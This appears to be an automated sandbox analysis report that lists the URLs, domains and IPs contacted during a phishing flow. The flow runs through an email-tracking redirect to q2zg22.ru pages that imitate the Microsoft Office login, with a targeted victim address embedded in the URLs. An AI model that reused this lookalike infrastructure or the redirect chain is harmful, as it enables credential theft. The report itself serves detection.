              https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424982651072914.MTc3ZWVkZGQtYTZjNy00OTZlLTgxODctYWFiZGUzNzYwM2JlNjljY2M1YzEtZjRmNy00Njg2LTk5NzctYmUyYmY1ZDhiYjVi&ui_locales=en-US&mkt=en-US&client-request-id=27340d1a-f75c-4aed-bfd4-e7d89e08f2f5&state=Yvf-XDUrjz0oeLPkq8m6wvZNNx-4HHkagqS9BhHl9kXhuZbnWeP_boVBmzqCmf36UjRbbqyVFxS6NfMPtPrMzkYT0e3eC9jdOQOPVaXsUaKvdkKS66v9CzSs89a-xvCDlX83KjhHGwLHOIpviusPB2JbXEDMaguF9u_IRWYYWRgKHLprzYpu6YRCePlMSrde_70j5tZlDSgEnKs7NwUMbr6fRrt8o-EvCVkm0FfE3NnjacnfJhuLiNnd81beGyMvkxdpyTZsYXUvoKRGU0_4ng&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.00%Avira URL Cloudsafe
              https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424982717341745.ZTA1YTc1Y2QtM2Y3NS00MGY0LWFjYTQtOGFjMWVjMmVkMGM0M2MwMjM3NDEtMDBiMy00ZTkyLWE1MjAtMDI3YTU3ZGE0Mzlj&ui_locales=en-US&mkt=en-US&client-request-id=c9bbf586-3cb7-49e4-968c-855cb9b06dff&state=R1btjlLn0nsZ_HvybI1iQW79egJ4bfNhK6dkOmYcpbkizlXH594AztIP6k3xDmNUNdhPsej1iEMqwnjX96gynUUnHYVeqz7YpxI2QvZLJHV4r8DkHEi6Nk8gljZZv5WvGlIE5Og26go-5T2U69lQn1q5TI6o5VQMsZwWoXeA_nxn2T4NZft3rheUU5cDdv-TF9mO58xUEf_LDJcTw6zGzx-tCZqFP_odYqLyqaugqkr4-_v5VGMA8GP4vUjSWkdW82XubX6bTJ2NwLgrF94KOA&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.00%Avira URL Cloudsafe
              https://office.q2zg22.ru/cdn-cgi/challenge-platform/scripts/jsd/main.js0%Avira URL Cloudsafe
              https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424983050563650.Y2ExYzgxZjItYzQ0OC00NGZiLTlkZmEtMTgyODk2MjEzNTZlM2IyMDBhY2MtZjlmZC00NjY1LTg2MTQtMzBiOTZjZmQzZmZk&ui_locales=en-US&mkt=en-US&client-request-id=a2d3a705-3719-4180-a89a-d819ae49ee07&state=cVigJ0JKTf9_p9nwrLeIejpLLL12Uyh9OPJOdewXQlGmDl6PEuqBRU12YO_Rh7PQdKwvV6i1wFIUZ9-EhwYWtkG4yTfICV5C6jSNAUoADJ6_0zI8wNMdIdaSYa8hT-NSBLEbMy_G0BYDULKKBl4E9Ea810-L67NsvlH1vUDs5gM8GHezu9jGTZv5CnUNeALJbhR-E1LnrgBBLTmgIMnzcGRIYgbDyHMzjadqPT5yQgH1vbHDx95jzBZOmijLYriIMyXBuWk5BqZIt3QU0LE--A&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.00%Avira URL Cloudsafe
              https://aadcdn.msftauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg0%Avira URL Cloudsafe
              https://sushishop.commande?=0%Avira URL Cloudsafe
              https://aadcdn.msftauth.net/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_pwhoosk_q-bz40xlez3ihq2.js0%Avira URL Cloudsafe
              https://logincdn.msftauth.net/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif0%Avira URL Cloudsafe
              https://logincdn.msftauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg0%Avira URL Cloudsafe
              about:blank0%Avira URL Cloudsafe
              https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424982651072914.MTc3ZWVkZGQtYTZjNy00OTZlLTgxODctYWFiZGUzNzYwM2JlNjljY2M1YzEtZjRmNy00Njg2LTk5NzctYmUyYmY1ZDhiYjVi&ui_locales=en-US&mkt=en-US&client-request-id=27340d1a-f75c-4aed-bfd4-e7d89e08f2f5&state=Yvf-XDUrjz0oeLPkq8m6wvZNNx-4HHkagqS9BhHl9kXhuZbnWeP_boVBmzqCmf36UjRbbqyVFxS6NfMPtPrMzkYT0e3eC9jdOQOPVaXsUaKvdkKS66v9CzSs89a-xvCDlX83KjhHGwLHOIpviusPB2JbXEDMaguF9u_IRWYYWRgKHLprzYpu6YRCePlMSrde_70j5tZlDSgEnKs7NwUMbr6fRrt8o-EvCVkm0FfE3NnjacnfJhuLiNnd81beGyMvkxdpyTZsYXUvoKRGU0_4ng&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0&sso_reload=true0%Avira URL Cloudsafe
              https://office.q2zg22.ru/cdn-cgi/challenge-platform/h/b/jsd/r/84f4c6c0cc52672b0%Avira URL Cloudsafe
              https://logincdn.msftauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_ppassword_b2365db90edea8b1b8b1.js0%Avira URL Cloudsafe
              https://galeonconstruction.com/nin/niit/0%Avira URL Cloudsafe
              https://office.q2zg22.ru/common/GetCredentialType?mkt=en-US0%Avira URL Cloudsafe
              https://ywnjb.q2zg22.ru/s/afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04/521393ffd6e6e26814c2481ea580df56f06a765733586ff8dc0db635147b4d9a.js0%Avira URL Cloudsafe
              https://logincdn.msftauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.js0%Avira URL Cloudsafe
              https://logincdn.msftauth.net/16.000/Converged_v21033_mG-wAdV--_sq1kXms675SA2.css0%Avira URL Cloudsafe
              https://logincdn.msftauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_hvJVkkYnJRncZtU7cDywlg2.js0%Avira URL Cloudsafe
              http://thumbnail=5Fdocusign.png/0%Avira URL Cloudsafe
              https://office.q2zg22.ru/favicon.ico0%Avira URL Cloudsafe
              https://aadcdn.msftauth.net/shared/1.0/content/js/BssoInterrupt_Core_aoxn9LgNNeyAz3OYDcN7uA2.js0%Avira URL Cloudsafe
              https://microsoft-d2vkbmvzwzgf.q2zg22.ru/mail/inbox/0%Avira URL Cloudsafe
              https://logincdn.msftauth.net/16.000.30091.10/images/favicon.ico0%Avira URL Cloudsafe
              https://office.q2zg22.ru/0%Avira URL Cloudsafe
              https://microsoft-d2vkbmvzwzgf.q2zg22.ru/mail/inbox/#0%Avira URL Cloudsafe
              https://logincdn.msftauth.net/shared/1.0/content/js/ConvergedLogin_PCore_yZQmhMbiqPW1IsJcdAPQ0A2.js0%Avira URL Cloudsafe
              https://office.q2zg22.ru/cdn-cgi/challenge-platform/h/b/jsd/r/84f4c6af994b451d0%Avira URL Cloudsafe
              https://logincdn.msftauth.net/shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif0%Avira URL Cloudsafe
              https://aadcdn.msftauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_1ito3russhq-9gioj-zd4w2.css0%Avira URL Cloudsafe
              https://aadcdn.msftauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_6a0a7b7c69bd86706a39.js0%Avira URL Cloudsafe
              https://sushishop.?=0%Avira URL Cloudsafe
              https://logincdn.msftauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg0%Avira URL Cloudsafe
              https://galeonconstruction.com/nin/niit0%Avira URL Cloudsafe
              https://office.q2zg22.ru/common/instrumentation/reportbssotelemetry?hpgid=6&hpgact=1800&client-request-id=27340d1a-f75c-4aed-bfd4-e7d89e08f2f5&hpgrequestid=ee59cf26-64c6-4c07-90c2-84adcb7a32000%Avira URL Cloudsafe
              https://aadcdn.msftauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_d513b6f0c9182bbf1e0f.js0%Avira URL Cloudsafe
              https://office.q2zg22.ru/cdn-cgi/challenge-platform/h/b/scripts/jsd/24864818/main.js0%Avira URL Cloudsafe
              https://ywnjb.q2zg22.ru/s/afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04.js0%Avira URL Cloudsafe
              https://aadcdn.msftauth.net/shared/1.0/content/js/ConvergedLogin_PCore_rT0zkaZkTfaSAkKPThHEog2.js0%Avira URL Cloudsafe
              https://office.q2zg22.ru/s/afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04/521393ffd6e6e26814c2481ea580df56f06a765733586ff8dc0db635147b4d9a.js0%Avira URL Cloudsafe
              https://aadcdn.msftauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_7582d7648944aa49d261.js0%Avira URL Cloudsafe
              https://office.q2zg22.ru/s/afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04.js0%Avira URL Cloudsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              cs1100.wpc.omegacdn.net
              152.199.4.44
              truefalse
                unknown
                accounts.google.com
                64.233.185.84
                truefalse
                  high
                  sni1gl.wpc.alphacdn.net
                  152.195.19.97
                  truefalse
                    unknown
                    galeonconstruction.com
                    162.241.124.47
                    truefalse
                      unknown
                      react.q2zg22.ru
                      104.21.85.189
                      truefalse
                        unknown
                        part-0013.t-0009.t-msedge.net
                        13.107.213.41
                        truefalse
                          unknown
                          account.q2zg22.ru
                          104.21.85.189
                          truefalse
                            unknown
                            ywnjb.q2zg22.ru
                            104.21.85.189
                            truefalse
                              unknown
                              microsoft-d2vkbmvzwzgf.q2zg22.ru
                              104.21.85.189
                              truefalse
                                unknown
                                www.google.com
                                142.250.105.99
                                truefalse
                                  high
                                  part-0023.t-0009.t-msedge.net
                                  13.107.213.51
                                  truefalse
                                    unknown
                                    cs1227.wpc.alphacdn.net
                                    192.229.211.199
                                    truefalse
                                      unknown
                                      mix-collect-it-prod-481773621.eu-west-3.elb.amazonaws.com
                                      35.181.229.138
                                      truefalse
                                        high
                                        part-0012.t-0009.t-msedge.net
                                        13.107.213.40
                                        truefalse
                                          unknown
                                          clients.l.google.com
                                          142.251.15.113
                                          truefalse
                                            high
                                            office.q2zg22.ru
                                            172.67.209.71
                                            truefalse
                                              unknown
                                              clients1.google.com
                                              unknown
                                              unknownfalse
                                                high
                                                aadcdn.msftauth.net
                                                unknown
                                                unknownfalse
                                                  unknown
                                                  logincdn.msftauth.net
                                                  unknown
                                                  unknownfalse
                                                    unknown
                                                    sushishop.commander1.com
                                                    unknown
                                                    unknownfalse
                                                      high
                                                      clients2.google.com
                                                      unknown
                                                      unknownfalse
                                                        high
                                                        identity.nel.measure.office.net
                                                        unknown
                                                        unknownfalse
                                                          high
                                                          acctcdn.msftauth.net
                                                          unknown
                                                          unknownfalse
                                                            unknown
                                                            NameMaliciousAntivirus DetectionReputation
                                                            https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424983050563650.Y2ExYzgxZjItYzQ0OC00NGZiLTlkZmEtMTgyODk2MjEzNTZlM2IyMDBhY2MtZjlmZC00NjY1LTg2MTQtMzBiOTZjZmQzZmZk&ui_locales=en-US&mkt=en-US&client-request-id=a2d3a705-3719-4180-a89a-d819ae49ee07&state=cVigJ0JKTf9_p9nwrLeIejpLLL12Uyh9OPJOdewXQlGmDl6PEuqBRU12YO_Rh7PQdKwvV6i1wFIUZ9-EhwYWtkG4yTfICV5C6jSNAUoADJ6_0zI8wNMdIdaSYa8hT-NSBLEbMy_G0BYDULKKBl4E9Ea810-L67NsvlH1vUDs5gM8GHezu9jGTZv5CnUNeALJbhR-E1LnrgBBLTmgIMnzcGRIYgbDyHMzjadqPT5yQgH1vbHDx95jzBZOmijLYriIMyXBuWk5BqZIt3QU0LE--A&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0false
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://aadcdn.msftauth.net/ests/2.1/content/cdnbundles/ux.converged.login.strings-en.min_pwhoosk_q-bz40xlez3ihq2.jsfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://clients1.google.com/tools/pso/ping?as=chrome&brand=ONGR&pid=&hl=en&events=C1I,C2I,C7I,C1S,C7S&rep=2&rlz=C1:,C2:,C7:&id=0000000000000000000000000000000000000000A77D70936Cfalse
                                                              high
                                                              https://logincdn.msftauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svgfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://logincdn.msftauth.net/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.giffalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://office.q2zg22.ru/cdn-cgi/challenge-platform/scripts/jsd/main.jsfalse
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424982717341745.ZTA1YTc1Y2QtM2Y3NS00MGY0LWFjYTQtOGFjMWVjMmVkMGM0M2MwMjM3NDEtMDBiMy00ZTkyLWE1MjAtMDI3YTU3ZGE0Mzlj&ui_locales=en-US&mkt=en-US&client-request-id=c9bbf586-3cb7-49e4-968c-855cb9b06dff&state=R1btjlLn0nsZ_HvybI1iQW79egJ4bfNhK6dkOmYcpbkizlXH594AztIP6k3xDmNUNdhPsej1iEMqwnjX96gynUUnHYVeqz7YpxI2QvZLJHV4r8DkHEi6Nk8gljZZv5WvGlIE5Og26go-5T2U69lQn1q5TI6o5VQMsZwWoXeA_nxn2T4NZft3rheUU5cDdv-TF9mO58xUEf_LDJcTw6zGzx-tCZqFP_odYqLyqaugqkr4-_v5VGMA8GP4vUjSWkdW82XubX6bTJ2NwLgrF94KOA&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0false
                                                              • Avira URL Cloud: safe
                                                              unknown
                                                              https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424982717341745.ZTA1YTc1Y2QtM2Y3NS00MGY0LWFjYTQtOGFjMWVjMmVkMGM0M2MwMjM3NDEtMDBiMy00ZTkyLWE1MjAtMDI3YTU3ZGE0Mzlj&ui_locales=en-US&mkt=en-US&client-request-id=c9bbf586-3cb7-49e4-968c-855cb9b06dff&state=R1btjlLn0nsZ_HvybI1iQW79egJ4bfNhK6dkOmYcpbkizlXH594AztIP6k3xDmNUNdhPsej1iEMqwnjX96gynUUnHYVeqz7YpxI2QvZLJHV4r8DkHEi6Nk8gljZZv5WvGlIE5Og26go-5T2U69lQn1q5TI6o5VQMsZwWoXeA_nxn2T4NZft3rheUU5cDdv-TF9mO58xUEf_LDJcTw6zGzx-tCZqFP_odYqLyqaugqkr4-_v5VGMA8GP4vUjSWkdW82XubX6bTJ2NwLgrF94KOA&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0#sales@dudick.comtrue
                                                                unknown
                                                                https://react.q2zg22.ru/loginfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424982651072914.MTc3ZWVkZGQtYTZjNy00OTZlLTgxODctYWFiZGUzNzYwM2JlNjljY2M1YzEtZjRmNy00Njg2LTk5NzctYmUyYmY1ZDhiYjVi&ui_locales=en-US&mkt=en-US&client-request-id=27340d1a-f75c-4aed-bfd4-e7d89e08f2f5&state=Yvf-XDUrjz0oeLPkq8m6wvZNNx-4HHkagqS9BhHl9kXhuZbnWeP_boVBmzqCmf36UjRbbqyVFxS6NfMPtPrMzkYT0e3eC9jdOQOPVaXsUaKvdkKS66v9CzSs89a-xvCDlX83KjhHGwLHOIpviusPB2JbXEDMaguF9u_IRWYYWRgKHLprzYpu6YRCePlMSrde_70j5tZlDSgEnKs7NwUMbr6fRrt8o-EvCVkm0FfE3NnjacnfJhuLiNnd81beGyMvkxdpyTZsYXUvoKRGU0_4ng&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0false
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://aadcdn.msftauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svgfalse
                                                                • Avira URL Cloud: safe
                                                                unknown
                                                                https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424983050563650.Y2ExYzgxZjItYzQ0OC00NGZiLTlkZmEtMTgyODk2MjEzNTZlM2IyMDBhY2MtZjlmZC00NjY1LTg2MTQtMzBiOTZjZmQzZmZk&ui_locales=en-US&mkt=en-US&client-request-id=a2d3a705-3719-4180-a89a-d819ae49ee07&state=cVigJ0JKTf9_p9nwrLeIejpLLL12Uyh9OPJOdewXQlGmDl6PEuqBRU12YO_Rh7PQdKwvV6i1wFIUZ9-EhwYWtkG4yTfICV5C6jSNAUoADJ6_0zI8wNMdIdaSYa8hT-NSBLEbMy_G0BYDULKKBl4E9Ea810-L67NsvlH1vUDs5gM8GHezu9jGTZv5CnUNeALJbhR-E1LnrgBBLTmgIMnzcGRIYgbDyHMzjadqPT5yQgH1vbHDx95jzBZOmijLYriIMyXBuWk5BqZIt3QU0LE--A&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0#sales@dudick.comtrue
                                                                  unknown
                                                                  https://galeonconstruction.com/nin/niit/false
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  about:blankfalse
                                                                  • Avira URL Cloud: safe
                                                                  low
                                                                  https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424982651072914.MTc3ZWVkZGQtYTZjNy00OTZlLTgxODctYWFiZGUzNzYwM2JlNjljY2M1YzEtZjRmNy00Njg2LTk5NzctYmUyYmY1ZDhiYjVi&ui_locales=en-US&mkt=en-US&client-request-id=27340d1a-f75c-4aed-bfd4-e7d89e08f2f5&state=Yvf-XDUrjz0oeLPkq8m6wvZNNx-4HHkagqS9BhHl9kXhuZbnWeP_boVBmzqCmf36UjRbbqyVFxS6NfMPtPrMzkYT0e3eC9jdOQOPVaXsUaKvdkKS66v9CzSs89a-xvCDlX83KjhHGwLHOIpviusPB2JbXEDMaguF9u_IRWYYWRgKHLprzYpu6YRCePlMSrde_70j5tZlDSgEnKs7NwUMbr6fRrt8o-EvCVkm0FfE3NnjacnfJhuLiNnd81beGyMvkxdpyTZsYXUvoKRGU0_4ng&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0&sso_reload=truefalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://office.q2zg22.ru/cdn-cgi/challenge-platform/h/b/jsd/r/84f4c6c0cc52672bfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://logincdn.msftauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_ppassword_b2365db90edea8b1b8b1.jsfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://logincdn.msftauth.net/shared/1.0/content/js/oneDs_f2e0f4a029670f10d892.jsfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://office.q2zg22.ru/favicon.icofalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://office.q2zg22.ru/common/GetCredentialType?mkt=en-USfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://ywnjb.q2zg22.ru/s/afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04/521393ffd6e6e26814c2481ea580df56f06a765733586ff8dc0db635147b4d9a.jsfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://logincdn.msftauth.net/16.000/content/js/ConvergedLoginPaginatedStrings.en_hvJVkkYnJRncZtU7cDywlg2.jsfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://logincdn.msftauth.net/16.000/Converged_v21033_mG-wAdV--_sq1kXms675SA2.cssfalse
                                                                  • Avira URL Cloud: safe
                                                                  unknown
                                                                  https://sushishop.commander1.com/c3?firsttime=1&tcs=2478&chn=emailing&src=neolane&cmp=20231127_email_relance_app30_befr&cty=be&med=actu&url=//galeonconstruction.com/nin/niitfalse
                                                                    high
                                                                    https://office.q2zg22.ru/common/oauth2/v2.0/authorize?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&redirect_uri=https%3A%2F%2Fwww.office.com%2Flandingv2&response_type=code%20id_token&scope=openid%20profile%20https%3A%2F%2Fwww.office.com%2Fv2%2FOfficeHome.All&response_mode=form_post&nonce=638424982651072914.MTc3ZWVkZGQtYTZjNy00OTZlLTgxODctYWFiZGUzNzYwM2JlNjljY2M1YzEtZjRmNy00Njg2LTk5NzctYmUyYmY1ZDhiYjVi&ui_locales=en-US&mkt=en-US&client-request-id=27340d1a-f75c-4aed-bfd4-e7d89e08f2f5&state=Yvf-XDUrjz0oeLPkq8m6wvZNNx-4HHkagqS9BhHl9kXhuZbnWeP_boVBmzqCmf36UjRbbqyVFxS6NfMPtPrMzkYT0e3eC9jdOQOPVaXsUaKvdkKS66v9CzSs89a-xvCDlX83KjhHGwLHOIpviusPB2JbXEDMaguF9u_IRWYYWRgKHLprzYpu6YRCePlMSrde_70j5tZlDSgEnKs7NwUMbr6fRrt8o-EvCVkm0FfE3NnjacnfJhuLiNnd81beGyMvkxdpyTZsYXUvoKRGU0_4ng&x-client-SKU=ID_NET6_0&x-client-ver=6.34.0.0&sso_reload=true#sales@dudick.com=true
                                                                      unknown
                                                                      https://aadcdn.msftauth.net/shared/1.0/content/js/BssoInterrupt_Core_aoxn9LgNNeyAz3OYDcN7uA2.jsfalse
                                                                      • Avira URL Cloud: safe
                                                                      unknown
                                                                      https://aadcdn.msftauth.net/shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.icofalse
                                                                      • URL Reputation: safe
                                                                      unknown
                                                                      https://ywnjb.q2zg22.ru/Me.htm?v=3true
                                                                        unknown
                                                                        https://logincdn.msftauth.net/16.000.30091.10/images/favicon.icofalse
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://microsoft-d2vkbmvzwzgf.q2zg22.ru/mail/inbox/false
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://office.q2zg22.ru/false
                                                                        • Avira URL Cloud: safe
                                                                        unknown
                                                                        https://ywnjb.q2zg22.ru/oauth20_authorize.srf?client_id=4765445b-32c6-49b0-83e6-1d93765276ca&scope=openid+profile+https%3a%2f%2freact.q2zg22.ru%2fv2%2fOfficeHome.All&redirect_uri=https%3a%2f%2freact.q2zg22.ru%2flandingv2&response_type=code+id_token&state=R1btjlLn0nsZ_HvybI1iQW79egJ4bfNhK6dkOmYcpbkizlXH594AztIP6k3xDmNUNdhPsej1iEMqwnjX96gynUUnHYVeqz7YpxI2QvZLJHV4r8DkHEi6Nk8gljZZv5WvGlIE5Og26go-5T2U69lQn1q5TI6o5VQMsZwWoXeA_nxn2T4NZft3rheUU5cDdv-TF9mO58xUEf_LDJcTw6zGzx-tCZqFP_odYqLyqaugqkr4-_v5VGMA8GP4vUjSWkdW82XubX6bTJ2NwLgrF94KOA&response_mode=form_post&nonce=638424982717341745.ZTA1YTc1Y2QtM2Y3NS00MGY0LWFjYTQtOGFjMWVjMmVkMGM0M2MwMjM3NDEtMDBiMy00ZTkyLWE1MjAtMDI3YTU3ZGE0Mzlj&x-client-SKU=ID_NET6_0&x-client-Ver=6.34.0.0&uaid=c9bbf5863cb749e4968c855cb9b06dff&msproxy=1&issuer=mso&tenant=common&ui_locales=en-US&epct=PAQABAAEAAAAmoFfGtYxvRrNriQdPKIZ-fpe1vwdUJkY82ZhiJe6dZAazdC0yzeQJJRTvFYOwRwcElNBSvxdCWYrC3SWRQx-4PgW46cqont4lIpPdTPko0yShUMTF97s6JNl2oTSn9sGpADw9tB-sITNf3ywWIMAA43EIRCDr8jwd66nEWyjcN6ukC7rHkGx2wY8Vd9SspNmgiDPuF7RBPuj5SL3QM3C4M1Kh06FbCzoMkifzVJpPWCAA&jshs=0&username=sales%40dudick.com&login_hint=sales%40dudick.comfalse
                                                                          unknown
                                                                          https://accounts.google.com/ListAccounts?gpsia=1&source=ChromiumBrowser&json=standardfalse
                                                                            high
                                                                            https://aadcdn.msftauth.net/ests/2.1/content/cdnbundles/converged.v2.login.min_1ito3russhq-9gioj-zd4w2.cssfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://logincdn.msftauth.net/shared/1.0/content/js/ConvergedLogin_PCore_yZQmhMbiqPW1IsJcdAPQ0A2.jsfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://aadcdn.msftauth.net/shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svgfalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://logincdn.msftauth.net/shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.giffalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://aadcdn.msftauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pcustomizationloader_6a0a7b7c69bd86706a39.jsfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://office.q2zg22.ru/cdn-cgi/challenge-platform/h/b/jsd/r/84f4c6af994b451dfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://galeonconstruction.com/nin/niitfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://logincdn.msftauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svgfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://aadcdn.msftauth.net/shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.giffalse
                                                                            • URL Reputation: safe
                                                                            unknown
                                                                            https://office.q2zg22.ru/common/instrumentation/reportbssotelemetry?hpgid=6&hpgact=1800&client-request-id=27340d1a-f75c-4aed-bfd4-e7d89e08f2f5&hpgrequestid=ee59cf26-64c6-4c07-90c2-84adcb7a3200false
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://aadcdn.msftauth.net/shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_d513b6f0c9182bbf1e0f.jsfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://ywnjb.q2zg22.ru/s/afc35fefb916ef4eaaf2fe859837e744a9c25a67b61248f6ee93c6a02ca7fe04.jsfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
                                                                            https://office.q2zg22.ru/cdn-cgi/challenge-platform/h/b/scripts/jsd/24864818/main.jsfalse
                                                                            • Avira URL Cloud: safe
                                                                            unknown
